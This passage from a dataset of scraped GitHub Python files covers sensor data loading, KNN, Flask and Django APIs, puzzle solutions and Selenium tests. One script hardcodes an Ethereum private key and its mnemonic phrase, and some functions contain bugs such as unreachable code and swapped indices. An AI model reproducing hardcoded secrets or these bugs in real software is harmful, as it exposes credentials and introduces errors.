'merged2.html')\n\n","repo_name":"geishatokyo-lightning/lightning","sub_path":"lightning_core/sample/composite.py","file_name":"composite.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"27"} +{"seq_id":"34612400008","text":"import numpy as np\nimport random\nimport os\nfrom collections import OrderedDict\nimport tensorflow as tf\n\nclass Loader():\n def __init__(self, dataset = \"Left_Foot\", num_samples_per_direction = 100, sample_size = 350, shuffle = True ):\n self.dataset = dataset\n self.dataset_path = os.path.join(\"python_model_training/data/npy/\",self.dataset)\n self.sample_size = sample_size\n self.num_samples_per_direction = num_samples_per_direction\n self.shuffle = shuffle\n if self.dataset == \"Left_Foot\": self.labels = ['lf_front','lf_frontLeft','lf_left','lf_bottomLeft','lf_bottom']\n elif self.dataset == \"Right_Foot\": self.labels = ['rf_front','rf_frontRight','rf_right','rf_bottomRight','rf_bottom']\n self.data = OrderedDict()\n self.data[self.labels[0]] = np.load(os.path.join(self.dataset_path,self.labels[0]+'.npy')) \n self.data[self.labels[1]] = np.load(os.path.join(self.dataset_path,self.labels[1]+'.npy')) \n self.data[self.labels[2]] = np.load(os.path.join(self.dataset_path,self.labels[2]+'.npy')) \n self.data[self.labels[3]] = np.load(os.path.join(self.dataset_path,self.labels[3]+'.npy')) \n self.data[self.labels[4]] = np.load(os.path.join(self.dataset_path,self.labels[4]+'.npy')) \n if(self.dataset == \"Left_Foot\"):\n self.test_data = OrderedDict()\n self.test_data[self.labels[0]] = np.load(os.path.join(\"python_model_training/data/npy/Left_Foot_Valid\", \"lf_valid_front.npy\"))\n self.test_data[self.labels[1]] = np.load(os.path.join(\"python_model_training/data/npy/Left_Foot_Valid\", \"lf_valid_frontLeft.npy\"))\n self.test_data[self.labels[2]] = np.load(os.path.join(\"python_model_training/data/npy/Left_Foot_Valid\", \"lf_valid_left.npy\"))\n self.test_data[self.labels[3]] = np.load(os.path.join(\"python_model_training/data/npy/Left_Foot_Valid\", \"lf_valid_bottomLeft.npy\"))\n self.test_data[self.labels[4]] = np.load(os.path.join(\"python_model_training/data/npy/Left_Foot_Valid\", \"lf_valid_bottom.npy\"))\n\n def load(self):\n label_idx = [0,1,2,3,4]\n N, H, W = self.num_samples_per_direction*len(label_idx), self.sample_size, 7\n all_data = np.empty((N,H,W))\n all_labels = []\n N_ = 0\n for i in range(N):\n random.shuffle(label_idx)\n for idx, label in enumerate(label_idx):\n all_data[N_,:H,:] = tf.keras.utils.normalize(self.data[self.labels[label]][i,:H,:W])\n all_labels.append(label)\n N_+=1\n if N_ == N: break\n train_data = np.array(all_data[:400,:,:])\n train_labels = np.array(all_labels[:400])\n val_data = np.array(all_data[400:,:,:])\n val_labels = np.array(all_labels[400:])\n return train_data, train_labels, val_data, val_labels\n\n if(self.dataset == \"Left_Foot\"):\n test_label_idx = [0,1,2,3,4]\n N, H, W = 20*len(test_label_idx), self.sample_size, 7 #self.num_samples_per_direction\n print(N,H,W)\n all_test_data = np.empty((N,H,W))\n all_test_labels = []\n N_ = 0\n for i in range(N):\n random.shuffle(test_label_idx)\n for idx, label in enumerate(test_label_idx):\n all_test_data[N_,:H,:] = tf.keras.utils.normalize(self.test_data[self.labels[label]][i,:H,:W])\n all_test_labels.append(label)\n N_+=1\n if N_ == N: break\n test_data = np.array(all_test_data)\n test_labels = np.array(all_test_labels)\n\n return train_data, train_labels, val_data, val_labels, test_data, test_labels\n\n\n# lf_loader = Loader()\n# train_data, train_labels, val_data, val_labels, test_data, test_labels = lf_loader.load()\n# print(train_data.shape, train_labels.shape, val_data.shape, val_labels.shape, test_data.shape, test_labels.shape)","repo_name":"carlodizon03/Insole-classification","sub_path":"python_model_training/dataLoader.py","file_name":"dataLoader.py","file_ext":"py","file_size_in_byte":3936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"36456529505","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nfrom scipy.spatial import distance\n\ndef KNN_test(X_train,Y_train,X_test,Y_test,K):\n \n n_train = len(X_train)\n n_test = len(X_test)\n \n dist = np.zeros(n_train)\n \n acc_pred = 0\n for i in range(n_test):\n for j in range(n_train):\n dist[j] = distance.euclidean(X_train[i],X_test[j])\n \n index_train = np.argsort(dist)\n sum=0\n for k in range(K):\n sum = sum + Y_train[index_train[k]]\n #print((dist[index_train[k]],\" Y: \", Y_train[index_train[k]] , \"SUM: \", sum \n \n \n #print(\"SUM: \") \n if sum > 0:\n y = 1\n else:\n y = -1\n \n if Y_test[i] == y:\n acc_pred += 1\n \n accuracy = acc_pred / n_test\n return accuracy\n\ndef choose_K(X_train,Y_train,X_val,Y_val):\n K = np.zeros(10)\n for i in range(1, 10, 2):\n K[i] = KNN_test(X_train,Y_train,X_val,Y_val,i)\n \n return K.argmax()","repo_name":"sayedcseku/unr-ml-cs622","sub_path":"Project1/nearest_neighbors.py","file_name":"nearest_neighbors.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"2411510296","text":"from flask import Flask, request\n\nfrom flask_cors import CORS\n\n# Docker\nfrom api import predictions\nfrom api import repository\n\n\n# Local\n#from api import predictions\n#from api import repository\n\n\nfrom werkzeug.middleware.proxy_fix import ProxyFix\n\napp = Flask(__name__)\nCORS(app, allow_headers=['Content-Type'])\napp.wsgi_app = ProxyFix(app.wsgi_app, x_proto=1)\n\n\n@app.route(\"/hello\")\ndef hello():\n return \"

Welcome to BLUE BiCIKL!

\"\n\n\n@app.route(\"/pollinators\")\ndef get_pollinators():\n return repository.get_all_tids(True)\n\n\n@app.route(\"/plants\")\ndef get_plants():\n return repository.get_all_tids(False)\n\n\n@app.route(\"/name\", methods=['GET'])\ndef get_name():\n taxon_id = request.json[\"species\"]\n print(repository.get_taxon_id_from_sci_name(taxon_id))\n\n\n@app.route(\"/pollinatorOf/\", methods=[\"GET\", \"POST\"])\n@app.route(\"/pollinatorOf\", methods=[\"GET\", \"POST\"])\ndef pollinator_of(taxon_id=None):\n # Our given taxa is a plant, we are looking for pollinators of taxon_id\n # Return plants which taxon_id is a pollinator of\n if taxon_id is None:\n species_name = request.json[\"species\"]\n if species_name is None:\n return \"\"\n try:\n taxon_id = int(species_name)\n except ValueError:\n taxon_id = repository.get_taxon_id_from_sci_name(species_name)\n\n relation = \"pollinates\"\n # Taxon of interest is NOT a subject\n is_subject = False\n strict = False\n\n # Check input args\n confidence = request.args.get(\"confidence\")\n if not confidence:\n confidence = 0.5\n\n if not check_args(confidence): return \"invalid arguments, check confidence is float between 0 and 1\", 400\n\n taxon_info = repository.get_input_taxonomy(taxon_id)\n if not taxon_info:\n return \"Taxon not found\", 404\n\n queried_dict = {\"input\": taxon_info}\n observed_dict = {\"observed\": repository.get_interactions(taxon_id, relation, is_subject)}\n predicted_dict = {\"predicted\": predictions.controller(relation, taxon_id, is_subject, confidence, strict)}\n\n return {**queried_dict, **observed_dict, **predicted_dict}\n\n # 3033668 -> pollinated by 1340470\n # Aconitium colombianum (colombian monskhood) pollinated by Bombus appositus (bumblebee)\n\n\n@app.route(\"/pollinatedBy/\", methods=[\"GET\", \"POST\"])\n@app.route(\"/pollinatedBy\", methods=[\"GET\", \"POST\"])\ndef pollinated_by(taxon_id=None, confidence=0.95):\n # Given a pollinator, return plants pollinated by the pollinator\n if taxon_id is None:\n species_name = request.json[\"species\"]\n if species_name is None:\n return \"\"\n try:\n taxon_id = int(species_name)\n except ValueError:\n taxon_id = repository.get_taxon_id_from_sci_name(species_name)\n relation = \"pollinates\"\n is_subject = True\n confidence = request.args.get(\"confidence\")\n if not confidence:\n confidence = 0.5\n\n strict = False\n\n if not check_args(confidence): return \"invalid arguments, check confidence is float between 0 and 1\", 400\n\n taxon_info = repository.get_input_taxonomy(taxon_id)\n if not taxon_info:\n return \"Taxon not found\", 404\n\n queried_dict = {\"input\": taxon_info}\n observed_dict = {\"observed\": repository.get_interactions(taxon_id, relation, is_subject)}\n predicted_dict = {\"predicted\": predictions.controller(relation, taxon_id, is_subject, confidence, strict)}\n\n return {**queried_dict, **observed_dict, **predicted_dict}\n\n # 1340470 -> pollinates 3033668\n # Bombus appositus (bumblebee) pollinates Aconitium colombianum (colombian monskhood)\n\n\n@app.route(\"/predatorOf/\", methods=[\"GET\", \"POST\"])\n@app.route(\"/predatorOf\", methods=[\"GET\", \"POST\"])\ndef predator_of(taxon_id=None):\n if taxon_id is None:\n species_name = request.json[\"species\"]\n if species_name is None:\n return \"\"\n try:\n taxon_id = int(species_name)\n except ValueError:\n taxon_id = repository.get_taxon_id_from_sci_name(species_name)\n relation = \"preysOn\"\n is_subject = False\n\n queried_dict = {\"input\": repository.get_input_taxonomy(taxon_id)}\n observed_dict = {\"observed\": repository.get_interactions(taxon_id, relation, is_subject)}\n\n predicted_dict = {\"predicted\": []}\n return {**queried_dict, **observed_dict, **predicted_dict}\n\n # 1035290 (pilicornis) preys on 1036203 (properans)\n\n\n@app.route(\"/predatedBy/\")\n@app.route(\"/predatedBy\")\ndef predated_by(taxon_id=None):\n if taxon_id is None:\n species_name = request.json[\"species\"]\n if species_name is None:\n return \"\"\n try:\n taxon_id = int(species_name)\n except ValueError:\n taxon_id = repository.get_taxon_id_from_sci_name(species_name)\n relation = \"preysOn\"\n is_subject = True\n\n queried_dict = {\"input\": repository.get_input_taxonomy(taxon_id)}\n observed_dict = {\"observed\": repository.get_interactions(taxon_id, relation, is_subject)}\n\n predicted_dict = {\"predicted\": []}\n return {**queried_dict, **observed_dict, **predicted_dict}\n\n\n@app.route(\"/parasitizes/\")\n@app.route(\"/parasitizes\")\ndef parasitizes(taxon_id=None):\n if taxon_id is None:\n species_name = request.json[\"species\"]\n if species_name is None:\n return \"\"\n try:\n taxon_id = int(species_name)\n except ValueError:\n taxon_id = repository.get_taxon_id_from_sci_name(species_name)\n if species_name is None:\n return \"\"\n\n relation = \"parasiteOf\"\n is_subject = False\n\n queried_dict = {\"input\": repository.get_input_taxonomy(taxon_id)}\n observed_dict = {\"observed\": repository.get_interactions(taxon_id, relation, is_subject)}\n\n predicted_dict = {\"predicted\": []}\n return {**queried_dict, **observed_dict, **predicted_dict}\n\n # 1007770 (membranacea) parasiteOf 5422328 (pyrifera)\n\n\n@app.route(\"/parasitizedBy/\")\n@app.route(\"/parasitizedBy\")\ndef hosts(taxon_id=None):\n if taxon_id is None:\n species_name = request.json[\"species\"]\n if species_name is None:\n return \"\"\n try:\n taxon_id = int(species_name)\n except ValueError:\n taxon_id = repository.get_taxon_id_from_sci_name(species_name)\n if species_name is None:\n return \"\"\n relation = \"parasiteOf\"\n is_subject = True\n\n queried_dict = {\"input\": repository.get_input_taxonomy(taxon_id)}\n observed_dict = {\"observed\": repository.get_interactions(taxon_id, relation, is_subject)}\n\n predicted_dict = {\"predicted\": []}\n return {**queried_dict, **observed_dict, **predicted_dict}\n\n # 1007770 (membranacea) parasiteOf 5422328 (pyrifera)\n\n\n@app.route(\"/predict\", methods=[\"GET\", \"POST\"])\ndef predict():\n request_data = request.get_json()\n relation = request_data['relation']\n is_subject = request_data['is_subject']\n taxon_id = request_data['taxon_id']\n check = request_data['check']\n confidence = request_data[\"confidence\"]\n strict = False\n\n queried_dict = {\"input\": repository.get_input_taxonomy(taxon_id)}\n\n predicted_dict = {\"predicted\": predictions.controller(relation, taxon_id, is_subject, confidence, strict, check)}\n\n return {**queried_dict, **predicted_dict}\n\n\n@app.route(\"/interactions\", methods=[\"GET\"])\ndef interactions():\n interactions_list = {\n \"pollinates\": [\n ['pollinatorOf', 'Pollinators of'],\n ['pollinatedBy', 'Pollinated by']\n ],\n \"preysOn\": [\n ['predatorOf', 'Predators of'],\n ['predatedBy', 'Predated by']\n ],\n \"parasiteOf\": [\n ['parasitizes', 'Parasites of'],\n ['parasitizedBy', 'Parasitized by']\n ]\n }\n\n return {\"Interactions\": interactions_list}\n\n\ndef check_args(confidence):\n if type(confidence) != float or confidence > 1 or confidence < 0:\n return False\n return True\n\n","repo_name":"DiSSCo/BiCIKL_Linkages_API","sub_path":"flask_app/api/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"36088083080","text":"#\n# @lc app=leetcode.cn id=18 lang=python3\n#\n# [18] 四数之和\n#\nimport bisect\nfrom typing import List\n# @lc code=start\n\n\nclass Solution:\n def __init__(self):\n self.result = []\n\n def classic_double_index(self, nums: List[int], target: int) -> List[List[int]]:\n nums.sort()\n if len(nums) < 4:\n return []\n \"\"\"双指针\"\"\"\n for k, v in enumerate(nums[:-3]):\n # 当数组最小值和都大于target 跳出\n if v*4 > target:\n break\n # 当数组最大值和都小于target或者已经遍历过,遍历下一个\n if v + 3*nums[-1] < target or (v == nums[k-1] and k > 0):\n continue\n for _k, _v in enumerate(nums[k+1:-2], k+1):\n # 同理\n if v + _v*3 > target:\n break\n if v + _v + nums[-1]*2 < target or (_v == nums[_k-1] and _k > k+1):\n continue\n R = len(nums)-1\n L = max(_k + 1, bisect.bisect_left(nums, target-nums[R] - _v - v, _k + 1, R) - 1)\n while L < R:\n _sum = v+_v+nums[L]+nums[R]\n if _sum == target:\n self.result.append(\n tuple(sorted((v, _v, nums[L], nums[R]))))\n L = bisect.bisect_right(nums, nums[L], L, R)\n R = bisect.bisect_left(nums, nums[R], L, R)-1\n else:\n L, R = L+(_sum < target), R-(_sum > target)\n return [list(_) for _ in set(self.result)]\n\n def brute_for(self, nums: List[int], target: int) -> List[List[int]]:\n nums.sort()\n if len(nums) < 4:\n return []\n counter = {}\n for n in nums:\n counter[n] = counter.get(n, 0)+1\n \"\"\"双指针\"\"\"\n for k, v in enumerate(nums[:-3]):\n # 当数组最小值和都大于target 跳出\n if v*4 > target:\n break\n # 当数组最大值和都小于target或者已经遍历过,遍历下一个\n if v + 3*nums[-1] < target or (v == nums[k-1] and k > 0):\n continue\n counter[v] -= 1\n for _k, _v in enumerate(nums[k+1:-2], k+1):\n # 同理\n if v + _v*3 > target:\n break\n if v + _v + nums[-1]*2 < target or (_v == nums[_k-1] and _k > k+1):\n continue\n counter[_v] -= 1\n for __k in range(_k if counter[_v] > 0 else _k+1, len(nums)):\n c = nums[__k]\n d = target-v-_v-c\n if c > d:\n break\n if d not in counter or c == d and counter[c] < 2:\n continue\n self.result.append((v, _v, c, d))\n counter[_v] += 1\n return [list(_) for _ in set(self.result)]\n\n def fourSum(self, nums: List[int], target: int) -> List[List[int]]:\n return {\n 1: lambda nums, target: self.classic_double_index(nums, target),\n 2: lambda nums, target: self.brute_for(nums, target),\n }[2](nums, target)\n\n\n# @lc code=end\nif __name__ == \"__main__\":\n test = Solution()\n print(test.fourSum([0, 0, 0, 0], 0))\n","repo_name":"StrayCamel247/Leetcode","sub_path":"questions/18.四数之和.py","file_name":"18.四数之和.py","file_ext":"py","file_size_in_byte":3335,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"27"} +{"seq_id":"36724706446","text":"from os import write\nimport subprocess\nimport OMMCOLLECTION\nimport OMM\nimport flatbuffers\nfrom web3.auto import w3\nfrom eth_account.messages import encode_defunct\nfrom eth_account import Account\n\n\ndef calculate_cid(file_path):\n cmd = ['ipfs', 'add', '-n', file_path]\n output = subprocess.run(cmd, capture_output=True)\n cid = output.stdout.decode().strip().split(\" \")[1]\n return cid\n\n\nprovider_eth_address = \"0x9858EfFD232B4033E47d90003D41EC34EcaEda94\"\nfb_cid = \"QmepW1hutjHdrPMhWBJCyinz8bfjtJ3WKsspb5vvcD6DTz\"\npdFP = f\"data/{provider_eth_address}/{fb_cid}.OMM.fbs\"\n\n# Load OMMCOLLECTION from file\nwith open(pdFP, \"rb\") as f:\n xOMM = f.read()\n\n# Load the signature from a text file\nwith open(pdFP+\".sig\", \"r\") as f:\n signature = f.read()\n\nmessage = encode_defunct(text=fb_cid)\nstuff = w3.eth.account.recover_message(\n message, signature=signature)\n\nprint(\"Valid Digital Signature: \", stuff == provider_eth_address)\n\nyOMMCOLLECTION = OMMCOLLECTION.OMMCOLLECTION.GetRootAsOMMCOLLECTION(xOMM)\n\nfor yOMM in range(yOMMCOLLECTION.RECORDSLength()):\n yOMMRECORD = yOMMCOLLECTION.RECORDS(yOMM)\n # print(yOMMRECORD.NORAD_CAT_ID())\n\n# create OMM object\nommt = OMM.OMMT()\n\n# set OMM object properties\nommt.NORAD_CAT_ID = 25544\nommt.OBJECT_NAME = \"ISS (ZARYA)\"\nommt.OBJECT_ID = \"1998-067A\"\nommt.EPOCH = \"2023-01-03T12:36:01.932768\"\nommt.MEAN_MOTION = 15.49892242\nommt.ECCENTRICITY = 0.0005004\nommt.INCLINATION = 51.6453\nommt.RA_OF_ASC_NODE = 64.1711\nommt.ARG_OF_PERICENTER = 218.5032\nommt.MEAN_ANOMALY = 238.7671\nommt.EPHEMERIS_TYPE = 0\nommt.CLASSIFICATION_TYPE = \"U\"\nommt.ELEMENT_SET_NO = 999\nommt.REV_AT_EPOCH = 37625\nommt.BSTAR = 0.00030219\nommt.MEAN_MOTION_DOT = 0.00016767\nommt.MEAN_MOTION_DDOT = 0\n\n# create builder and pack OMM properties\nbuilder = flatbuffers.Builder()\nbuilder.Finish(ommt.Pack(builder))\niss_buf = builder.Output()\n\n# create OMMCOLLECTION and add OMM to the RECORDS list\nommc = OMMCOLLECTION.OMMCOLLECTIONT()\nommc.RECORDS = list()\nommc.RECORDS.append(ommt)\nbuilder.Finish(ommc.Pack(builder))\nommc_buf = builder.Output()\n\n# added OMM check\nprint(\"Added OMM has the same NORAD_CAT_ID: \",\n ommt.NORAD_CAT_ID == ommc.RECORDS[0].NORAD_CAT_ID)\n\niss = OMM.OMM.GetRootAs(iss_buf, 0)\nprint(\"CREATED OMM FOR ISS\", iss.NORAD_CAT_ID())\n\nommc = OMMCOLLECTION.OMMCOLLECTION.GetRootAs(ommc_buf, 0)\nprint(\"CREATED OMMCOLLECTION, ADDED ISS\", ommc.RECORDS(0).NORAD_CAT_ID())\nprint(\"\\n\")\n\niss_fp = \"iss.fbs\"\nommc_fp = \"ommc.fbs\"\n\niss_fpf = open(iss_fp, \"wb\")\niss_fpf.write(iss_buf)\niss_fpf.close()\n\nommc_fpf = open(ommc_fp, \"wb\")\nommc_fpf.write(ommc_buf)\nommc_fpf.close()\n\nprint(f\"Original CID Match ({fb_cid[:7]}...{fb_cid[41:]}): \", fb_cid == calculate_cid(pdFP))\n\niss_cid = calculate_cid(iss_fp)\nprint(\"ISS CID: \", iss_cid)\nommc_cid = calculate_cid(ommc_fp)\nprint(\"OMMC CID: \", ommc_cid)\nprint(\"\\n\")\n# `excess shallow future wheat amazing fee rug hammer hire crazy lumber mean`\nkey = \"0x1ab42cc412b618bdea3a599e3c9bae199ebf030895b039e9db1e30dafb12b727\"\n\nsigned_original = Account.sign_message(encode_defunct(text=fb_cid), key)\nprint(f\"Original SIG Match ({signature[:7]}...{signature[127:]}): \", signature == signed_original.signature.hex())\nsigned_iss_cid = Account.sign_message(encode_defunct(text=iss_cid), key)\nprint(\"SIGNED ISS CID: \", signed_iss_cid.signature.hex())\nsigned_omm_cid = Account.sign_message(encode_defunct(text=ommc_cid), key)\nprint(\"SIGNED OMMC CID: \", signed_omm_cid.signature.hex())\n","repo_name":"DigitalArsenal/OMM_PYTHON_TEST","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"17534819417","text":"\"\"\"Advent of code Day 8 part 2\"\"\"\n\n\ndef main():\n \"\"\"Main function\"\"\"\n with open('input.txt') as f:\n file_lines = f.read().split('\\n')\n\n code_len = sum(len(i) for i in file_lines)\n encoded_lines = [i.encode('unicode_escape').decode() for i in file_lines]\n # Encode quotemark characters\n for i, line in enumerate(encoded_lines):\n if '\"' in line:\n encoded_lines[i] = '\"' + line.replace(r'\"', r'\\\"') + '\"'\n\n encoded_len = sum(len(i) for i in encoded_lines)\n\n print(f'Encoded: {encoded_len}')\n print(f'Code: {code_len}')\n print(f'Answer: {encoded_len - code_len}')\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"michaelotty/aoc2015","sub_path":"08/aoc201508p2.py","file_name":"aoc201508p2.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"4962660482","text":"def divisors(num):\n try:\n if num < 0:\n raise ValueError(\"Solo se adminten Numeros positivos\")\n\n divisors = []\n for i in range(1, num +1):\n if num % i == 0:\n divisors.append(i)\n return divisors\n except ValueError as ve:\n return ve\n\ndef run():\n try:\n num = int(input('Ingresa un numero: '))\n print(divisors(num))\n print(\"Termino el programa\")\n except ValueError as ve:\n print(\"Solo se adminten Numeros\")\n\nif __name__ == '__main__':\n run()","repo_name":"oscargbocanegra/platzi","sub_path":"python/curso_intermedio_python/debugging.py","file_name":"debugging.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"43481332693","text":"from rest_framework import serializers\nfrom .models import Movie\nfrom genres.serializers import GenreSerializer\nfrom genres.models import Genre\n\n\nclass MovieSerializer(serializers.ModelSerializer):\n genres = GenreSerializer(many=True)\n\n class Meta:\n model = Movie\n fields = [\n \"id\",\n \"title\",\n \"duration\",\n \"premiere\",\n \"budget\",\n \"overview\",\n \"genres\",\n ]\n\n def create(self, validated_data: dict) -> Movie:\n genres_list = validated_data.pop(\"genres\")\n movie_obj = Movie.objects.create(**validated_data)\n\n for genre_dict in genres_list:\n genreFound = Genre.objects.filter(name__iexact=genre_dict[\"name\"]).first()\n\n if not genreFound:\n genreFound = Genre.objects.create(**genre_dict)\n\n movie_obj.genres.add(genreFound)\n\n return movie_obj\n","repo_name":"MatheusMoura-M/kmdb","sub_path":"movies/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"6346757024","text":"import imp\r\nfrom flask import Flask,request,jsonify\r\nfrom flask_cors import CORS\r\n\r\napp = Flask(__name__)\r\nCORS(app)\r\n\r\n@app.route(\"/api/discountCalculator/\",methods=['GET'])\r\ndef GetNewAmount(amount):\r\n amount = float(amount)\r\n if(amount >= 10000):\r\n amount*=0.88\r\n elif(amount>=5000):\r\n amount*=0.92\r\n elif(amount >= 3000):\r\n amount*=0.97;\r\n return jsonify({\"TotalAmount\": str(amount)})\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=True,\r\n host='localhost',\r\n port=8000)","repo_name":"TonnyWong1052/ITP4523M-Internet-and-Multimedia-Applications-Development","sub_path":"PHP project/pythonApi/RESTful.py","file_name":"RESTful.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"42056248887","text":"import json\nimport os\nimport requests\nimport time\nfrom os.path import join, dirname\nfrom dotenv import load_dotenv\nfrom src.extractor.scrape import AbstractScraper\n\ndotenv_path = join(dirname(__file__), '.env')\nload_dotenv(dotenv_path)\n\n\nclass Scrape_aliexpress(AbstractScraper):\n def __init__(self):\n self.short_url = 'www.aliexpress.com'\n self._product_api = {}\n\n def _get_data(self, *args):\n global time_start\n time_start = time.time()\n api_source = \"https://magic-aliexpress1.p.rapidapi.com/api/products/search\"\n\n querystring = {\"name\": self.item, \"page\": \"1\"}\n\n headers = {\n 'x-rapidapi-key': os.environ.get(\"X_RAPIDAPI_KEY\"),\n 'x-rapidapi-host': os.environ.get(\"X_RAPIDAPI_HOST_500_MO\")\n }\n\n response = requests.request(\"GET\", api_source, headers=headers, params=querystring)\n\n # with open(\"json_responses.txt\", \"a\") as json_file:\n # json_file.write(str(response.text))\n # json_file.write('\\nNew request\\n')\n\n return json.loads(str(response.text))\n\n def _extract_data(self, response):\n item_list = response['docs']\n api = {'data': []}\n\n rating_over = '5'\n\n for item in item_list:\n title = item['product_title']\n price_value = item['app_sale_price']\n price_curr = item['app_sale_price_currency']\n base_url = item['product_detail_url']\n\n try:\n shipping = item['metadata']['logistics']['logisticsDesc']\n rating_val = item['evaluate_rate']\n rating = str(rating_val) + '/5'\n except:\n shipping = None\n rating_val = 0\n rating = None\n\n api['data'].append(\n self._construct_api(title=title, price_value=price_value, price_curr=price_curr, base_url=base_url,\n rating_val=rating_val, rating_over=rating_over, rating=rating, shipping=shipping,\n short_url=self.short_url))\n time_end = time.time()\n self._update_details(api, time_start=time_start, time_end=time_end)\n\n return api\n\n def _get_api(self):\n json_data = self._get_data()\n return self._extract_data(json_data)\n\n def __call__(self, **kwargs):\n self.item = kwargs['item']\n self._product_api = self._get_api()\n\n return self._product_api\n","repo_name":"odorT/iBuy","sub_path":"src/extractor/scrape_aliexpress.py","file_name":"scrape_aliexpress.py","file_ext":"py","file_size_in_byte":2458,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"27"} +{"seq_id":"7269860113","text":"nilai = [{'nim' : 'A01', 'nama' : 'Agustina', 'mid' : 50, 'uas' : 80},\r\n {'nim' : 'A02', 'nama' : 'Budi', 'mid' : 40, 'uas' : 90}, \r\n {'nim' : 'A03', 'nama' : 'Chicha', 'mid' : 100, 'uas' : 50}, \r\n {'nim' : 'A04', 'nama' : 'Donna', 'mid' : 20, 'uas' : 100},\r\n {'nim' : 'A05', 'nama' : 'Fatimah', 'mid' : 70, 'uas' : 100}]\r\n\r\nprint('='*67)\r\nprint('NIM'.ljust(10), 'NAMA'.ljust(15), 'N.MID'.ljust(10), 'N.UAS'.ljust(10), 'N.AKHIR'.ljust(10), 'STATUS')\r\nprint('-'*67)\r\nfor i in nilai:\r\n na = (i['mid'] +2*i['uas'])/3\r\n membulat = round(na)\r\n if na >= 60:\r\n status = 'LULUS'\r\n if na < 60:\r\n status = 'TIDAK LULUS'\r\n print(i['nim'].ljust(10), i['nama'].ljust(15), str(i['mid']).ljust(10), str(i['uas']).ljust(10), str(membulat).ljust(10), status)\r\nprint('='*67)\r\n","repo_name":"adhidharmawan/Python-Projects-Protek","sub_path":"praktikum 9/nomor 6.py","file_name":"nomor 6.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"sr","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"19543660228","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\n\nfrom .base import FunctionalTest\n\n\nclass NewVisitorTest(FunctionalTest):\n ''' Тест от лица нового посетителя '''\n\n def test_can_stat_a_list_for_one_user(self):\n '''Тест: можно создать список и получить его позже'''\n\n # Семён слышал про крутое онлайн-приложение со списком\n # неотложных дел. Он решает оценить его домашнюю страницу\n self.browser.get(self.live_server_url)\n\n # Он видит, что заголовок и шапка страницы говорят о списках\n # неотложныхх дел\n self.assertIn('To-Do', self.browser.title)\n header_text = self.browser.find_element_by_tag_name('h1').text\n self.assertIn('To-Do', header_text)\n\n # Ему сразу же предлагают ввести элемент из списка\n inputbox = self.get_item_input_box()\n self.assertEqual(\n inputbox.get_attribute('placeholder'),\n 'Enter a to-do item'\n )\n\n # Он набирает в текстовом поле - \"Купить книгу по программированию\"\n inputbox.send_keys('Купить книгу по программированию')\n\n # Когда он нажмёт Enter, страница обновляется, и теперь страница\n # Содержит \"1: Купить книгу по программированию\" в качестве элемента списка\n inputbox.send_keys(Keys.ENTER)\n self.wait_for_row_in_list_table('1: Купить книгу по программированию')\n\n # Теперь он набирает в текстовом поле - \"Купить видеокарту\"\n # Когда он нажмёт Enter, страница обновляется, и теперь страница\n # Содержит \"2: Купить видеокарту\n inputbox = self.get_item_input_box()\n inputbox.send_keys('Купить видеокарту') \n inputbox.send_keys(Keys.ENTER)\n\n self.wait_for_row_in_list_table('1: Купить видеокарту')\n self.wait_for_row_in_list_table('2: Купить книгу по программированию')\n\n # Семён завершает работу и ложиться спать\n \n def test_multiple_users_can_start_lists_at_different_urls(self):\n '''Тест: многочисленные польователи могут начать списки по разным URL'''\n # Семён начинает новый список\n self.browser.get(self.live_server_url)\n inputbox = self.get_item_input_box()\n inputbox.send_keys('Купить книгу по программированию')\n inputbox.send_keys(Keys.ENTER)\n self.wait_for_row_in_list_table('1: Купить книгу по программированию')\n\n # Он замечает, что его список имеет уникальный URL-адрес\n semen_list_url = self.browser.current_url\n self.assertRegex(semen_list_url, '/lists/.+')\n\n # Теперь новый пользователь, Артём, заходит на сайт\n self.browser.quit()\n self.browser = webdriver.Chrome()\n \n # Артём посещает домашнюю страницу. Нет никаких признаков списка Семёна\n self.browser.get(self.live_server_url)\n page_text = self.browser.find_element_by_tag_name('body').text\n self.assertNotIn('Купить книгу по программированию', page_text)\n\n # Артём начинает новый список, вводя новый элемент\n inputbox = self.get_item_input_box()\n inputbox.send_keys('Купить молоко')\n inputbox.send_keys(Keys.ENTER)\n self.wait_for_row_in_list_table('1: Купить молоко')\n\n # Артём получает уникальый URL-адрес\n artem_list_url = self.browser.current_url\n self.assertRegex(artem_list_url, '/lists/.+')\n self.assertNotEqual(artem_list_url, semen_list_url)\n\n # Опять-таки, нет следа от списка Семёна\n page_text = self.browser.find_element_by_tag_name('body').text\n self.assertNotIn('Купить книгу по программированию', page_text)\n self.assertIn('Купить молоко', page_text)\n\n # Семён и Артём заканчивают свою работу со 